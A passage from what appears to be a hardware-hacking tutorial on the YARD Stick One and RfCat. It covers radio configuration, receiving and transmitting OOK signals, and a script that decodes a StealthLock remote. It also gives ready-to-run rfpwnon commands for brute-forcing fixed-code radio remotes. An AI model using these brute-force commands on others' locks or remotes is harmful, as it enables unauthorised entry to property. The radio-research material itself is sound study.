class="string">"HALLO"</span>) // Transmit data</span><br><span class="line"> >>> d.RFrecv() // Receive data</span><br><span class="line"> >>> <span class="built_in">print</span> d.reprRadioConfig() // Print the configuration</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">In [1]: <span class="built_in">print</span> d.reprRadioConfig() // Print the configuration</span><br><span class="line">== Hardware ==</span><br><span class="line">Dongle: YARDSTICKONE</span><br><span class="line">Firmware rev: 0348</span><br><span class="line">Compiler: Not found! 
Update needed!</span><br><span class="line">Bootloader: CC-Bootloader</span><br><span class="line"></span><br><span class="line">== Software ==</span><br><span class="line">rflib rev: 450</span><br><span class="line"></span><br><span class="line">== Frequency Configuration ==</span><br><span class="line">Frequency: 901999877.929688 hz (0x259555L)</span><br><span class="line">Channel: 0</span><br><span class="line">Intermediate freq: 281250 hz</span><br><span class="line">Frequency Offset: 0 +/-</span><br><span class="line">Est. Freq Offset: 241</span><br><span class="line"></span><br><span class="line">== Modem Configuration ==</span><br><span class="line">Modulation: 2FSK</span><br><span class="line">DRate: 38360.595703 hz</span><br><span class="line">ChanBW: 93750.000000 hz</span><br><span class="line">DEVIATION: 20507.812500 hz</span><br><span class="line">Sync Mode: 15 of 16 bits must match</span><br><span class="line">Min TX Preamble: 4 bytes</span><br><span class="line">Chan Spacing: 199951.171875 hz</span><br><span class="line">BSLimit: No data rate offset compensation performed</span><br><span class="line">DC Filter: enabled</span><br><span class="line">Manchester Encoding: disabled</span><br><span class="line">Fwd Err Correct: disabled</span><br><span class="line"></span><br><span class="line">== Packet Configuration ==</span><br><span class="line">Sync Word: 0x0C4E</span><br><span class="line">Packet Length: 255</span><br><span class="line">Length Config: Fixed Packet Mode</span><br><span class="line">Configured Address: 0x0</span><br><span class="line">Preamble Quality Threshold: 4 * 2</span><br><span class="line">Append Status: No</span><br><span class="line">Rcvd Packet Check: No address check</span><br><span class="line">Data Whitening: off</span><br><span class="line">Packet Format: Normal mode</span><br><span class="line">CRC: disabled</span><br><span class="line"></span><br><span class="line">== AES Crypto Configuration ==</span><br><span 
class="line">AES Mode: CBC - Cipher Block Chaining</span><br><span class="line">Crypt RF Input: off</span><br><span class="line">Crypt RF Output: off</span><br><span class="line"></span><br><span class="line">== Radio Test Signal Configuration ==</span><br><span class="line">TEST2: 0x88</span><br><span class="line">TEST1: 0x31</span><br><span class="line">TEST0: 0x9</span><br><span class="line">VCO_SEL_CAL_EN: 0x0</span><br><span class="line"></span><br><span class="line">== Radio State ==</span><br><span class="line"> MARCSTATE: MARC_STATE_RX (d)</span><br><span class="line"> DONGLE RESPONDING: mode :c, last error<span class="comment"># 1</span></span><br><span class="line"></span><br><span class="line">== Client State ==</span><br><span class="line">========================================================================================================================</span><br><span class="line"> client thread cycles: 99/14</span><br><span class="line"> client errored cycles: 0</span><br><span class="line"> recv_queue: (0 bytes) <span class="string">''</span></span><br><span class="line"> trash: (3 blobs) <span class="string">"[128, 142, (1495128220.831341, '')]"</span></span><br><span class="line"> recv_mbox (2 keys) <span class="string">"['0x42', '0xff']"</span></span><br><span class="line"> app 0x42 (1 records)</span><br><span class="line"> [0x7] (0 frames) <span class="string">"[]"</span></span><br><span class="line"></span><br><span class="line"> app 0xff (4 records)</span><br><span class="line"> [0x88] (0 frames) <span class="string">"[]"</span></span><br><span class="line"> [0x80] (0 frames) <span class="string">"[]"</span></span><br><span class="line"> [0x82] (0 frames) <span class="string">"[]"</span></span><br><span class="line"> [0x86] (0 frames) <span class="string">"[]"</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">In [2]: d.ping()</span><br><span class="line">PING: 26 bytes transmitted, received: 
<span class="string">'ABCDEFGHIJKLMNOPQRSTUVWXYZ'</span> (0.003433 seconds)</span><br><span class="line">PING: 26 bytes transmitted, received: <span class="string">'ABCDEFGHIJKLMNOPQRSTUVWXYZ'</span> (0.003278 seconds)</span><br><span class="line">PING: 26 bytes transmitted, received: <span class="string">'ABCDEFGHIJKLMNOPQRSTUVWXYZ'</span> (0.003287 seconds)</span><br><span class="line">PING: 26 bytes transmitted, received: <span class="string">'ABCDEFGHIJKLMNOPQRSTUVWXYZ'</span> (0.003417 seconds)</span><br><span class="line">PING: 26 bytes transmitted, received: <span class="string">'ABCDEFGHIJKLMNOPQRSTUVWXYZ'</span> (0.003243 seconds)</span><br><span class="line">PING: 26 bytes transmitted, received: <span class="string">'ABCDEFGHIJKLMNOPQRSTUVWXYZ'</span> (0.003240 seconds)</span><br><span class="line">PING: 26 bytes transmitted, received: <span class="string">'ABCDEFGHIJKLMNOPQRSTUVWXYZ'</span> (0.003528 seconds)</span><br><span class="line">PING: 26 bytes transmitted, received: <span class="string">'ABCDEFGHIJKLMNOPQRSTUVWXYZ'</span> (0.003263 seconds)</span><br><span class="line">PING: 26 bytes transmitted, received: <span class="string">'ABCDEFGHIJKLMNOPQRSTUVWXYZ'</span> (0.003441 seconds)</span><br><span class="line">PING: 26 bytes transmitted, received: <span class="string">'ABCDEFGHIJKLMNOPQRSTUVWXYZ'</span> (0.003416 seconds)</span><br><span class="line">Out[2]: (10, 0, 0.03384900093078613)</span><br><span class="line"></span><br><span class="line">In [3]: d.setFreq(433000000) // Set the signal frequency to 433 MHz</span><br><span class="line"></span><br><span class="line">In [4]: d.specan(433e6) // Spectrum analyzer view; 433e6 sets the frequency, written in scientific notation and equal to 433000000</span><br><span class="line"></span><br><span class="line">In [5]: bin(0x1234f) // Base conversion: hexadecimal to binary</span><br><span class="line">Out[5]: <span class="string">'0b10010001101001111'</span></span><br><span class="line"></span><br><span class="line">In [6]: <span class="built_in">help</span>(d) // Show help for all parameters</span><br><span 
class="line"></span><br><span class="line">In [7]: d. # press Tab to list all available methods</span><br><span class="line">Display all 182 possibilities? (y or n)</span><br><span class="line">d.FHSSxmit d.getChannel d.mac_SyncCell d.rf_redirection d.setMdmNumPreamble</span><br><span class="line">d.RESET d.getChannels d.makePktFLEN d.rsema d.setMdmSyncMode</span><br><span class="line">d.RFcapture d.getCompilerInfo d.makePktVLEN d.runEP5_recv d.setMdmSyncWord</span><br><span class="line">d.RFdump d.getDebugCodes d.max_packet_size d.runEP5_send d.setModeIDLE</span><br><span class="line">d.RFlisten d.getEnableMdmDCFilter d.mhz d.run_ctrl d.setModeRX</span><br><span class="line">d.RFrecv d.getEnableMdmFEC d.nextChannel d.scan d.setModeTX</span><br><span class="line">d.RFtestLong d.getEnableMdmManchester d.peek d.send d.setPktAddr</span><br><span class="line">d.RFxmit d.getEnablePktAppendStatus d.ping d.send_thread d.setPktPQT</span><br><span class="line">d.RFxmitLong d.getEnablePktCRC d.poke d.send_threadcounter d.setPower</span><br><span class="line">d.adjustFreqOffset d.getEnablePktDataWhitening d.pokeReg d.setAESiv d.setRFRegister</span><br><span class="line">d.bootloader d.getFHSSstate d.printClientState d.setAESkey d.setRFbits</span><br><span class="line">d.calculateFsIF d.getFreq d.printRadioConfig d.setAESmode d.setRFparameters</span><br><span class="line">d.calculateFsOffset d.getFreqEst d.printRadioState d.setAmpMode d.setRadioConfig</span><br><span class="line">d.calculateMdmDeviatn d.getFsIF d.radiocfg d.setBSLimit d.setRfMode</span><br><span class="line">d.calculatePktChanBW d.getFsOffset d.recv d.setChannel d.setup</span><br><span class="line">d.changeChannel d.getInterruptRegisters d.recvAll d.setChannels d.setup24330MHz</span><br><span class="line">d.checkRepr d.getLQI d.recv_event d.setEnDeCoder d.setup900MHz</span><br><span class="line">d.chipnum d.getMACdata d.recv_mbox d.setEnableCCA d.setup900MHzContTrans</span><br><span class="line">d.chipstr d.getMACthreshold 
d.recv_queue d.setEnableMdmDCFilter d.setup900MHzHopTrans</span><br><span class="line">d.cleanup d.getMARCSTATE d.recv_thread d.setEnableMdmFEC d.setup_rfstudio_902PktTx</span><br><span class="line">d.clearDebugCodes d.getMdmChanBW d.recv_threadcounter d.setEnableMdmManchester d.specan</span><br><span class="line">d.ctrl_thread d.getMdmChanSpc d.reprAESMode d.setEnablePktAppendStatus d.startHopping</span><br><span class="line">d.debug d.getMdmDRate d.reprClientState d.setEnablePktCRC d.stopHopping</span><br><span class="line">d.devnum d.getMdmDeviatn d.reprDebugCodes d.setEnablePktDataWhitening d.strobeModeCAL</span><br><span class="line">d.discover d.getMdmModulation d.reprFreqConfig d.setFHSSstate d.strobeModeFSTXON</span><br><span class="line">d.endec d.getMdmNumPreamble d.reprHardwareConfig d.setFreq d.strobeModeIDLE</span><br><span class="line">d.ep0GetAddr d.getMdmSyncMode d.reprMACdata d.setFsIF d.strobeModeRX</span><br><span class="line">d.ep0Peek d.getMdmSyncWord d.reprMdmModulation d.setFsOffset d.strobeModeReturn</span><br><span class="line">d.ep0Ping d.getPartNum d.reprModemConfig d.setMACdata d.strobeModeTX</span><br><span class="line">d.ep0Poke d.getPktAddr d.reprPacketConfig d.setMACperiod d.testTX</span><br><span class="line">d.ep0Reset d.getPktLEN d.reprRadioConfig d.setMACthreshold d.trash</span><br><span class="line">d.ep5timeout d.getPktPQT d.reprRadioState d.setMaxPower d.xmit_event</span><br><span class="line">d.freq_offset_accumulator d.getRSSI d.reprRadioTestSignalConfig d.setMdmChanBW d.xmit_queue</span><br><span class="line">d.getAESmode d.getRadioConfig d.reprSoftwareConfig d.setMdmChanSpc d.xsema</span><br><span class="line">d.getAmpMode d.idx d.reset_event d.setMdmDRate</span><br><span class="line">d.getBSLimit d.lowball d.resetup d.setMdmDeviatn</span><br><span class="line">d.getBuildInfo d.lowballRestore d.rf_configure d.setMdmModulation</span><br><span class="line"></span><br><span class="line">In [10]: 
d.</span><br></pre></td></tr></table></figure><h3 id="1-5-接收信号"><a href="#1-5-接收信号" class="headerlink" title="1.5 Receiving signals"></a>1.5 Receiving signals</h3><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="string">'RfCat, the greatest thing since Frequency Hopping!'</span></span><br><span class="line"></span><br><span class="line">Research Mode: enjoy the raw power of rflib</span><br><span class="line"></span><br><span class="line">currently your environment has an object called <span class="string">"d"</span> <span class="keyword">for</span> dongle. 
this is how</span><br><span class="line">you interact with the rfcat dongle:</span><br><span class="line"> >>> d.ping()</span><br><span class="line"> >>> d.setFreq(433000000)</span><br><span class="line"> >>> d.setMdmModulation(MOD_ASK_OOK)</span><br><span class="line"> >>> d.makePktFLEN(250)</span><br><span class="line"> >>> d.RFxmit(<span class="string">"HALLO"</span>)</span><br><span class="line"> >>> d.RFrecv()</span><br><span class="line"> >>> <span class="built_in">print</span> d.reprRadioConfig()</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">In [1]: d.setFreq(433800000) # set the signal frequency to 433.8 MHz</span><br><span class="line"></span><br><span class="line">In [2]: d.setMdmModulation(MOD_ASK_OOK) # set the modulation to ASK / OOK</span><br><span class="line"></span><br><span class="line">In [3]: d.setMdmDRate(4800) # set the baud rate</span><br><span class="line"></span><br><span class="line">In [4]: d.setMaxPower()</span><br><span class="line"></span><br><span class="line">In [5]: d.lowball()</span><br><span class="line"></span><br><span class="line">In [6]: d.RFlisten() # start listening for data</span><br><span class="line">Entering RFlisten mode... 
packets arriving will be displayed on the screen</span><br><span class="line">(press Enter to stop)</span><br></pre></td></tr></table></figure>
<h3 id="1-5-发送-OOK-信号"><a href="#1-5-发送-OOK-信号" class="headerlink" title="1.5 Sending an OOK signal"></a>1.5 Sending an OOK signal</h3><p>Method 1</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="string">'RfCat, the greatest thing since Frequency Hopping!'</span></span><br><span class="line"></span><br><span class="line">Research Mode: enjoy the raw power of rflib</span><br><span class="line"></span><br><span class="line">currently your environment has an object called <span class="string">"d"</span> <span class="keyword">for</span> dongle. this is how</span><br><span class="line">you interact with the rfcat dongle:</span><br><span class="line"> >>> d.ping()</span><br><span class="line"> >>> d.setFreq(433000000)</span><br><span class="line"> >>> d.setMdmModulation(MOD_ASK_OOK)</span><br><span class="line"> >>> d.makePktFLEN(250)</span><br><span class="line"> >>> d.RFxmit(<span class="string">"HALLO"</span>)</span><br><span class="line"> >>> d.RFrecv()</span><br><span class="line"> >>> <span class="built_in">print</span> d.reprRadioConfig()</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">In [1]: d.setFreq(433e6) # set the signal frequency to 433 MHz</span><br><span class="line"></span><br><span class="line">In [2]: d.setMdmModulation(MOD_ASK_OOK) # set the modulation to ASK / OOK</span><br><span class="line"></span><br><span class="line">In [3]: d.setMdmDRate(int(1.0/0.000550)) # set the baud rate</span><br><span class="line"></span><br><span class="line">In [4]: d.RFxmit(<span class="string">"\x8E\x8E\x88\x88\x8E\x88\x88\x00\x00\x00"</span> * 20) # send the hex-encoded signal <span class="string">"\x8E\x8E\x88\x88\x8E\x88\x88\x00\x00\x00"</span> 20 times</span><br></pre></td></tr></table></figure>
<p>Method 2</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="string">'RfCat, the greatest thing since Frequency Hopping!'</span></span><br><span class="line"></span><br><span class="line">Research Mode: enjoy the raw power of rflib</span><br><span class="line"></span><br><span class="line">currently your environment has an object called <span class="string">"d"</span> <span class="keyword">for</span> dongle. this is how</span><br><span class="line">you interact with the rfcat dongle:</span><br><span class="line"> >>> d.ping()</span><br><span class="line"> >>> d.setFreq(433000000)</span><br><span class="line"> >>> d.setMdmModulation(MOD_ASK_OOK)</span><br><span class="line"> >>> d.makePktFLEN(250)</span><br><span class="line"> >>> d.RFxmit(<span class="string">"HALLO"</span>)</span><br><span class="line"> >>> d.RFrecv()</span><br><span class="line"> >>> <span class="built_in">print</span> d.reprRadioConfig()</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">In [1]: d.setFreq(433800000) # set the signal frequency to 433.8 MHz</span><br><span class="line"></span><br><span class="line">In [2]: d.setMdmModulation(MOD_ASK_OOK) # set the modulation to ASK / OOK</span><br><span class="line"></span><br><span class="line">In [3]: d.makePktFLEN(4) # set the packet length to 4, because we only send 4 bytes here</span><br><span class="line"></span><br><span class="line">In [4]: d.setMdmDRate(4800) # set the baud rate</span><br><span 
class="line"></span><br><span class="line">In [5]: d.setMaxPower()</span><br><span class="line"></span><br><span class="line">In [6]: <span class="keyword">for</span> i <span class="keyword">in</span> range(0,15):d.RFxmit(<span class="string">'\xDE\xAD\xBE\xEF'</span>) # send the data 15 times</span><br></pre></td></tr></table></figure>
<h3 id="1-6-使用-Python-脚本"><a href="#1-6-使用-Python-脚本" class="headerlink" title="1.6 Using a Python script"></a>1.6 Using a Python script</h3><p>Python script</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/python</span></span><br><span class="line"><span class="comment">#</span></span><br><span class="line"><span class="comment"># This is a rudimentary implementation of packet reception using YARD Stick One</span></span><br><span class="line"><span class="comment"># with RfCat demonstrated in Rapid Radio Reversing presented at ToorCon 17</span></span><br><span class="line"><span class="comment"># (2015).</span></span><br><span class="line"><span class="comment">#</span></span><br><span class="line"><span class="comment"># File Name: sl.py</span></span><br><span class="line"><span class="comment"># usage from rfcat interactive shell:</span></span><br><span class="line"><span class="comment"># %run sl.py</span></span><br><span class="line"><span class="comment"># rxsl(d)</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">from</span> rflib <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line"></span><br><span class="line"><span class="comment"># This validity check is only verifying certain bytes that are present in all</span></span><br><span class="line"><span class="comment"># packets. It really should be followed up (or replaced) by a checksum</span></span><br><span class="line"><span class="comment"># verification.</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">packet_valid</span><span class="params">(p)</span>:</span></span><br><span class="line">    <span class="keyword">if</span> ord(p[<span class="number">0</span>]) != <span class="number">0x6d</span>:</span><br><span class="line">        <span class="keyword">return</span> <span class="keyword">False</span></span><br><span class="line">    <span class="keyword">if</span> ord(p[<span class="number">1</span>]) != <span class="number">0xb6</span>:</span><br><span class="line">        <span class="keyword">return</span> <span class="keyword">False</span></span><br><span class="line">    <span class="keyword">if</span> ord(p[<span class="number">6</span>]) != <span class="number">0x6d</span>:</span><br><span class="line">        <span class="keyword">return</span> <span class="keyword">False</span></span><br><span class="line">    <span class="keyword">if</span> ord(p[<span class="number">7</span>]) != <span class="number">0xb6</span>:</span><br><span class="line">        <span class="keyword">return</span> <span class="keyword">False</span></span><br><span class="line">    <span class="keyword">if</span> (ord(p[<span class="number">29</span>]) & <span class="number">0xfc</span>) != <span class="number">0</span>:</span><br><span class="line">        <span class="keyword">return</span> <span class="keyword">False</span></span><br><span class="line">    <span class="keyword">return</span> <span class="keyword">True</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># This could probably be simpler and/or easier to read. It extracts every</span></span><br><span class="line"><span class="comment"># third bit in order to decode the pulse width modulation (PWM). The PWM</span></span><br><span class="line"><span class="comment"># implemented by StealthLock is well behaved in that the pulse durations and</span></span><br><span class="line"><span class="comment"># interval durations are all one or two times the length of a time unit and</span></span><br><span class="line"><span class="comment"># data bits are represented by a consistent number (3) of time units. This is</span></span><br><span class="line"><span class="comment"># the time unit I have used in the RfCat symbol rate configuration, so a long</span></span><br><span class="line"><span class="comment"># pulse appears as symbols (1, 1, 0) and a short pulse appears as (1, 0, 0).</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">pwm_decode</span><span class="params">(p)</span>:</span></span><br><span class="line">    biginteger = <span class="number">0</span></span><br><span class="line">    <span class="keyword">for</span> byte <span class="keyword">in</span> p:</span><br><span class="line">        biginteger <<= <span class="number">8</span></span><br><span class="line">        biginteger |= ord(byte)</span><br><span class="line">    biginteger >>= <span class="number">12</span></span><br><span class="line">    out = <span class="number">0</span></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">28</span>, (len(p)*<span class="number">8</span><span class="number">-12</span>)/<span class="number">3</span>, <span class="number">1</span>):</span><br><span class="line">        out <<= <span class="number">1</span></span><br><span class="line">        out |= ((biginteger & <span class="number">1</span>) ^ <span class="number">1</span>)</span><br><span class="line">        biginteger >>=<span class="number">3</span></span><br><span class="line">    <span class="keyword">return</span> out</span><br><span class="line"></span><br><span class="line"><span class="comment"># checksum byte is 0xff minus 8-bit addition of previous bytes, like so:</span></span><br><span class="line"><span class="comment"># hex(0xff-(0x02+0x98+0x76+0xff+0xff)&0xff)</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">rxsl</span><span class="params">(device)</span>:</span> <span class="comment"># function (method)</span></span><br><span class="line">    device.setFreq(<span class="number">314980000</span>)</span><br><span class="line">    device.setMdmModulation(MOD_ASK_OOK)</span><br><span class="line">    device.setMdmDRate(<span class="number">2450</span>)</span><br><span class="line">    device.setPktPQT(<span class="number">0</span>)</span><br><span class="line">    device.setMdmSyncMode(<span class="number">2</span>)</span><br><span class="line">    device.setMdmSyncWord(<span class="number">0x06db</span>)</span><br><span class="line">    device.setMdmNumPreamble(<span class="number">0</span>)</span><br><span class="line">    device.setMaxPower()</span><br><span class="line">    device.lowball()</span><br><span class="line">    device.makePktFLEN(<span class="number">30</span>)</span><br><span class="line"></span><br><span class="line">    <span class="keyword">while</span> <span class="keyword">not</span> keystop():</span><br><span class="line">        <span class="keyword">try</span>:</span><br><span class="line">            pkt, ts = device.RFrecv()</span><br><span class="line">            <span class="keyword">if</span> packet_valid(pkt):</span><br><span class="line">                <span class="comment">#print "Received: %s" % pkt.encode('hex')</span></span><br><span class="line">                <span class="keyword">print</span> <span class="string">"0x%012x"</span> % pwm_decode(pkt)</span><br><span class="line">        <span class="keyword">except</span> ChipconUsbTimeoutException:</span><br><span class="line">            <span class="keyword">pass</span></span><br><span class="line">    sys.stdin.read(<span class="number">1</span>)</span><br></pre></td></tr></table></figure>
<p>Calling it from the RfCat command line</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="comment"># rfcat -r</span></span><br><span class="line"><span class="string">'RfCat, the greatest thing since Frequency Hopping!'</span></span><br><span class="line"></span><br><span class="line">Research Mode: enjoy the raw power of rflib</span><br><span class="line"></span><br><span class="line">currently your environment has an object called <span class="string">"d"</span> <span class="keyword">for</span> dongle. 
this is how</span><br><span class="line">you interact with the rfcat dongle:</span><br><span class="line"> >>> d.ping()</span><br><span class="line"> >>> d.setFreq(433000000)</span><br><span class="line"> >>> d.setMdmModulation(MOD_ASK_OOK)</span><br><span class="line"> >>> d.makePktFLEN(250)</span><br><span class="line"> >>> d.RFxmit(<span class="string">"HALLO"</span>)</span><br><span class="line"> >>> d.RFrecv()</span><br><span class="line"> >>> <span class="built_in">print</span> d.reprRadioConfig()</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">In [1]: %run sl.py # run the sl.py script</span><br><span class="line"></span><br><span class="line">In [2]: rxsl(d) # call the function defined in the script</span><br></pre></td></tr></table></figure>
<h2 id="2-rfpwnon-信号暴力穷举"><a href="#2-rfpwnon-信号暴力穷举" class="headerlink" title="2. rfpwnon: brute-forcing radio signals"></a>2. rfpwnon: brute-forcing radio signals</h2><p><a href="https://github.com/exploitagency/github-rfpwnon" target="_blank" rel="noopener">rfpwnon</a> is a Python script, built on rfcat, for brute-force attacks on radio signals.</p>
<h3 id="2-1-安装"><a href="#2-1-安装" class="headerlink" title="2.1 Installation"></a>2.1 Installation</h3><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">apt-get install python python-pip rfcat</span><br><span class="line">pip install bitstring</span><br><span class="line">wget https://raw.githubusercontent.com/exploitagency/github-rfpwnon/master/rfpwnon.py</span><br><span class="line">chmod +x rfpwnon.py</span><br><span class="line">./rfpwnon.py --<span class="built_in">help</span></span><br></pre></td></tr></table></figure>
<h3 id="2-2-帮助信息"><a href="#2-2-帮助信息" class="headerlink" title="2.2 Help output"></a>2.2 Help output</h3>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="comment"># ./rfpwnon.py -h</span></span><br><span class="line">usage: rfpwnon.py [-h] [-v] [-f BASEFREQ] [-b BAUDRATE] [-l BINLENGTH]</span><br><span class="line"> [-r REPEATTIMES] [--keys] [-p PPAD] [-t TPAD] [--raw]</span><br><span class="line"> [--tri] [--show]</span><br><span class="line"></span><br><span class="line">Application to use a rfcat compatible device to brute force a particular AM</span><br><span class="line">OOK or raw binary signal.</span><br><span class="line"></span><br><span class="line">optional arguments:</span><br><span class="line"> -h, --<span class="built_in">help</span> show this <span class="built_in">help</span> message and <span class="built_in">exit</span> // show the help information</span><br><span class="line"> -v, --version show program<span class="string">'s version number and exit // show the software version</span></span><br><span class="line"><span class="string"> -f BASEFREQ Specify the target frequency 
to transmit on, default is // set the signal frequency, default 915000000 Hz</span></span><br><span class="line"><span class="string"> 915000000.</span></span><br><span class="line"><span class="string"> -b BAUDRATE Specify the baudrate of the signal, default is 2000. // set the baud rate, default 2000</span></span><br><span class="line"><span class="string"> -l BINLENGTH Specify the binary length of the signal to brute force. By // set the length of the binary values to generate</span></span><br><span class="line"><span class="string"> default this is the binary length before pwm encoding. When</span></span><br><span class="line"><span class="string"> the flag --raw is set this is the binary length of the pwm</span></span><br><span class="line"><span class="string"> encoded signal.</span></span><br><span class="line"><span class="string"> -r REPEATTIMES Specify the number of times to repeat the signal. By default // set how many times each signal is repeated</span></span><br><span class="line"><span class="string"> this is set to 1 and uses the de bruijn sequence for speed. // when set to 1, the de Bruijn sequence is used for speed</span></span><br><span class="line"><span class="string"> When set greater than one the script sends each possible // when set above 1, the script takes more time to run</span></span><br><span class="line"><span class="string"> permutation of the signal individually and takes much longer</span></span><br><span class="line"><span class="string"> to complete. 
For some applications the signal is required to</span></span><br><span class="line"><span class="string"> be sent multiple times.</span></span><br><span class="line"><span class="string"> --keys Displays the values being transmitted in binary, hex, and // show the binary, hexadecimal and decimal values being transmitted</span></span><br><span class="line"><span class="string"> decimal both before and after pwm encoding.</span></span><br><span class="line"><span class="string"> -p PPAD Specify your own binary padding to be attached before the // fixed binary value to prepend to the generated binary</span></span><br><span class="line"><span class="string"> brute forced binary.</span></span><br><span class="line"><span class="string"> -t TPAD Specify your own binary padding to be attached after the // fixed binary value to append to the generated binary</span></span><br><span class="line"><span class="string"> brute forced binary.</span></span><br><span class="line"><span class="string"> --raw This flag disables the script from performing the pwm</span></span><br><span class="line"><span class="string"> encoding of the binary signal. When set you must specify the</span></span><br><span class="line"><span class="string"> full pwm encoded binary length using -l.</span></span><br><span class="line"><span class="string"> --tri This flag sets up the script to brute force a trinary</span></span><br><span class="line"><span class="string"> signal.</span></span><br><span class="line"><span class="string"> --show Prints de Bruijn sequence before transmitting. 
// Prints the de Bruijn sequence</span></span><br></pre></td></tr></table></figure><h3 id="2-3-使用实例"><a href="#2-3-使用实例" class="headerlink" title="2.3 使用实例"></a>2.3 Usage examples</h3>
<p>Set the baud rate to <code>2000</code>, generate every <code>4</code>-bit binary signal, and send each signal <code>5</code> times.</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">./rfpwnon.py -f 315000000 -b 2000 -l 4 -r 5</span><br></pre></td></tr></table></figure>
<p>Set the baud rate to <code>1818</code>, start every signal with the binary prefix <code>100101</code>, generate every <code>10</code>-bit binary signal after it, and send each signal <code>2</code> times.</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">./rfpwnon.py -f 315060000 -b 1818 -p 100101 -l 10 -r 2</span><br></pre></td></tr></table></figure>
<p>Set the baud rate to <code>1818</code>, generate every <code>16</code>-bit binary signal, and send each signal <code>2</code> times. Sending all of the signals takes a long time.</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">./rfpwnon.py -f 315060000 -b 1818 -l 16 -r 2</span><br></pre></td></tr></table></figure>
<h2 id="3-ToorChat"><a href="#3-ToorChat" class="headerlink" title="3. ToorChat"></a>3. ToorChat</h2>
<p><a href="https://github.com/hathcox/ToorChat" target="_blank" rel="noopener">ToorChat</a> is a chat application that uses the <a href="https://greatscottgadgets.com/tc13badge/" target="_blank" rel="noopener">ToorCon 2013 badge</a>.<br>The YARD Stick One hardware uses the same chip and firmware as the ToorCon 2013 badge, so the program works on it as well.<br>ToorChat needs at least two RfCat-supported devices to communicate over radio.</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">git <span class="built_in">clone</span> https://github.com/hak5/ToorChat.git</span><br><span class="line"><span class="built_in">cd</span> ToorChat</span><br><span class="line">./toorchat.py</span><br></pre></td></tr></table></figure>
<p><img src="//files.iternull.com/images/2017-05-17_01-0003.png" alt=""></p>
<h2 id="4-固件"><a href="#4-固件" class="headerlink" title="4. 固件"></a>4. Firmware</h2>
<p>The YARD Stick One firmware is the one provided by <a href="https://bitbucket.org/atlas0fd00m/rfcat" target="_blank" rel="noopener">rfcat</a>, and the bootloader is <a href="https://github.com/AdamLaurie/CC-Bootloader" target="_blank" rel="noopener">CC-Bootloader</a>. Both the firmware and the hardware are open source, so you can write your own firmware to implement the features you need.</p>
<hr><h2 id="链接"><a href="#链接" class="headerlink" title="链接"></a>Links</h2>
<ul><li><a href="http://greatscottgadgets.com/yardstickone/" target="_blank" rel="noopener">Great Scott Gadgets - YARD Stick One</a></li><li><a href="https://github.com/greatscottgadgets/yardstick" target="_blank" rel="noopener">GitHub: YARD Stick One</a></li><li><a href="https://bitbucket.org/atlas0fd00m/rfcat" target="_blank" rel="noopener">rfcat project</a></li><li><a href="https://andrewmohawk.com/2012/09/06/hacking-fixed-key-remotes/" target="_blank" rel="noopener">Hacking fixed key remotes</a></li><li><a href="http://andrewmohawk.com/2015/08/31/hacking-fixed-key-remotes-with-only-rfcat/" target="_blank" rel="noopener">Hacking fixed key remotes with (only) RFCat</a></li><li><a href="https://www.youtube.com/watch?v=pkTlTCUeec0" target="_blank" rel="noopener">How to begin hacking with the YARD Stick One - Hak5 1908</a></li><li><a href="https://www.youtube.com/watch?v=F3bISk5t8cA" target="_blank" rel="noopener">How to Hack Wireless Remotes with Radio Replay Attacks - Hak5 1909</a></li><li><a href="https://www.youtube.com/watch?v=EZU2AZtfJbI" target="_blank" rel="noopener">Hacking Wireless Doorbells and Software Defined Radio tips - Hak5 1910</a></li><li><a href="https://www.youtube.com/watch?v=LqmVaf2KHYA" target="_blank" rel="noopener">Hacking Keyless Entry Remotes - Hak5 1911</a></li><li><a href="https://www.youtube.com/watch?v=blpycY5JCm0" target="_blank" rel="noopener">How to Hack Radio with Brute Force Attacks - Hak5 1912</a></li><li><a href="https://www.youtube.com/watch?v=eVqIe3na_Zk" target="_blank" rel="noopener">Radio Hacking: Reverse Engineering Protocols Part 1 - Hak5 1913</a></li><li><a href="https://www.youtube.com/watch?v=vf38-8LbDuw" target="_blank" rel="noopener">Radio Hacking: Reverse Engineering Protocols Part 2 - Hak5 1914</a></li><li><a href="https://pandwarf.com/news/yard-stick-one-vs-rtl-sdr-vs-pandwarf/" target="_blank" rel="noopener">Yard Stick One vs RTL-SDR vs PandwaRF: Fight of the dwarves</a></li><li><a href="http://greatscottgadgets.com/2015/12-29-rapid-radio-reversing-toorcon-2015/" target="_blank" rel="noopener">Rapid Radio Reversing, ToorCon 2015</a></li><li><a href="https://github.com/gyaresu/opensesame-yardstick" target="_blank" rel="noopener">opensesame-yardstick</a></li><li><a href="https://www.hak5.org/episodes/hak5-1908-how-to-begin-hacking-with-the-yard-stick-one" target="_blank" rel="noopener">Hak5 1908 – How to begin hacking with the YARD Stick One</a></li><li><a href="http://leetupload.com/blagosphere/index.php/2014/02/16/you-know-how-to-send-my-signal-setting-up-rfcat-from-scratch/" target="_blank" rel="noopener">You know how to send my signal — Setting up RFCat from scratch</a></li><li><a href="https://www.legacysecuritygroup.com/index.php/categories/13-sdr/22-rfpwnon-py-the-ultimate-rfcat-ask-ook-brute-force-tool" target="_blank" rel="noopener">rfpwnon.py rfcat ASK OOK 